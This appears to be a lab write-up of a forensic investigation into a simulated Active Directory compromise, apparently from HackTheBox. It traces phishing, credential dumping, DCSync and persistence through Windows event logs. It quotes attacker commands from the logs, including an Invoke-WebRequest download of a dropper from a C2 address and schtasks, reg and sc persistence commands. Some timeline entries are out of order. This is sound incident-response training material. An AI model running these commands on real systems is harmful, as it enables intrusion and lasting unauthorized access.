Skip to main content
bubka hacks stuff

HTB-GhostTrace

SOC Log Analysis Windows Active Directory Event Viewer Mimikatz PowerView
Table of Contents
Difficulty: Easy
OS: Windows
Date: 2026-01-31

Description:
Investigation of an Active Directory breach in Main.local domain involving DC01 and two clients (Client02, Client03). User on Client02 received a phishing email that led to full domain compromise.

TL;DR
#

Analyzed Windows Event Logs revealing a complete AD compromise chain: phishing email with macro-enabled document → credential dumping with Mimikatz → lateral movement via PsExec → DCSync attack → domain admin compromise → persistence via scheduled task, service, and registry run key.

Attack Timeline
#

 12025-05-25 03:27:56 UTC - Initial compromise (Client02)
 22025-05-25 03:32:02 UTC - Dropper download
 32025-05-25 04:28:17 UTC - Reverse shell established
 42025-05-25 03:37:00 UTC - PowerView downloaded
 52025-05-25 03:42:33 UTC - Kerberoasting (sqlsvc)
 62025-05-25 04:03:47 UTC - Lateral movement to Client03
 72025-05-25 04:10:43 UTC - Mimikatz execution
 82025-05-25 04:12:21 UTC - Credential abuse (lucas)
 92025-05-25 04:26:36 UTC - DCSync attack
102025-05-25 04:34:01 UTC - Domain Admin access
112025-05-25 04:38:53 UTC - Persistence established

Initial Access
#

T1566.001
At 2025-05-25 03:27:56 UTC, user MAIN\jody opened a malicious macro-enabled document:

1Process: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
2File: C:\Users\jody\Downloads\Profits.docm
3Parent: C:\Windows\explorer.exe (PID 2092)
4PID: 1160
5
6SHA256: 1C254F5E03462A7C232265E913162DF2AAE6B5EA5056284512BB32343C0A9507

Execution
#

The macro spawned a command shell, which launched PowerShell (PID 4776):

1Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2Parent: C:\Windows\System32\cmd.exe (PID 8996)
3Working Directory: C:\Users\jody\Documents\
4User: MAIN\jody

T1105
At 2025-05-25 03:32:02 UTC, the attacker downloaded a dropper:

1Invoke-WebRequest -Uri "http://192.168.204.152/UpdatePolicy.exe" -OutFile "C:\Users\jody\Downloads\UpdatePolicy.exe"

C2 Server: 192.168.204.152 T1071.001
At 2025-05-25 04:28:17 UTC, reverse shell established:

1Process: C:\Users\jody\Downloads\UpdatePolicy.exe (PID 4352)
2Source: 192.168.204.129:49956
3Destination: 192.168.204.152:1337

Discovery
#

T1087.002
At 2025-05-25 03:37:00 UTC, PowerView downloaded for AD enumeration:

1ScriptBlock ID: 232ebf81-40d1-402f-8910-9ee157bc7dca
2Path: C:\Users\jody\Downloads\PowerView.ps1

Credential Access
#

T1558.003
At 2025-05-25 03:42:33 UTC, Kerberos TGS requested for service account:

1Account: jody@MAIN.LOCAL
2Service: sqlsvc (S-1-5-21-620716483-2719109048-3577772375-2115)
3Ticket Encryption: 0x17 (RC4-HMAC)
4Ticket Options: 0x40810000

The attacker successfully cracked the service account credentials offline. T1003.001
At 2025-05-25 04:10:43 UTC, Mimikatz executed on Client02 (masqueraded as netdiag.exe):

1Process: C:\Users\jody\Downloads\netdiag.exe
2Parent: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 6304)
3User: NT AUTHORITY\SYSTEM
4Time: 2025-05-25 04:10:43 UTC

Credentials obtained: MAIN\lucas (cleartext password)

Lateral Movement
#

T1021.002
At 2025-05-25 04:03:47 UTC, lateral movement to Client03 via renamed PsExec:

1Process: C:\Windows\VgYTbFEK.exe
2User: NT AUTHORITY\SYSTEM
3Time: 2025-05-25 04:05:12 UTC

Post-exploitation commands executed at 04:07:57 UTC:

1whoami          # Verify SYSTEM privileges
2net user        # Enumerate local accounts (04:08:23 UTC)

T1078.002
At 2025-05-25 04:12:21 UTC, attacker used stolen credentials:

1runas /user:Main\lucas cmd
1Account: sqlsvc
2Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
3Logon Time: 2025-05-25 04:03:47 UTC
4Error Code: 0x0 (Success)

Privilege Escalation
#

T1003.006
At 2025-05-25 04:26:36 UTC, DCSync attack executed against DC01:

1Subject: MAIN\lucas (S-1-5-21-620716483-2719109048-3577772375-2114)
2Object Server: DS
3Access List: DS-Replication-Get-Changes-All
4Property GUID: {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}

This GUID corresponds to the DS-Replication-Get-Changes-All extended right, allowing replication of KRBTGT hash and all domain credentials.

Domain Admin Access: 2025-05-25 04:34:01 UTC

Persistence
#

T1053.005
At 2025-05-25 04:38:53 UTC:

1Process: C:\Windows\System32\schtasks.exe
2CommandLine: schtasks.exe /create /tn WindowsUpdateCheck /tr C:\Windows\System32\scvhost.exe /sc onstart /ru SYSTEM /f
3User: MAIN\Administrator
4Parent: C:\Windows\System32\wsmprovhost.exe (WinRM)

T1547.001
At 2025-05-25 04:40:09 UTC:

1Process: C:\Windows\System32\reg.exe
2CommandLine: reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v xcvafctr /t REG_SZ /d C:\Windows\System32\scvhost.exe /f
3User: MAIN\Administrator
4Parent: C:\Windows\System32\wsmprovhost.exe (WinRM)

T1543.003
At 2025-05-25 04:43:01 UTC:

1Process: C:\Windows\System32\sc.exe
2CommandLine: sc.exe create WindowsUpdateSvc binPath= C:\Windows\System32\scvhost.exe start= auto
3User: MAIN\Administrator
4Parent: C:\Windows\System32\wsmprovhost.exe (WinRM)

Persistence Payload: C:\Windows\System32\scvhost.exe (typosquatting svchost.exe)

Indicators of Compromise
#

Files:

  • C:\Users\jody\Downloads\Profits.docm (SHA256: 1C254F5E03462A7C232265E913162DF2AAE6B5EA5056284512BB32343C0A9507)
  • C:\Users\jody\Downloads\UpdatePolicy.exe
  • C:\Users\jody\Downloads\PowerView.ps1
  • C:\Users\jody\Downloads\netdiag.exe (Mimikatz)
  • C:\Windows\VgYTbFEK.exe (PsExec)
  • C:\Windows\System32\scvhost.exe (Persistence backdoor)

Network:

  • C2 Server: 192.168.204.152:1337
  • Victim: 192.168.204.129

Compromised Accounts:

  • MAIN\jody (initial victim)
  • MAIN\sqlsvc (service account - Kerberoasted)
  • MAIN\lucas (domain user)
  • MAIN\Administrator (domain admin)

Scheduled Task: WindowsUpdateCheck
Service: WindowsUpdateSvc
Registry Run Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\xcvafctr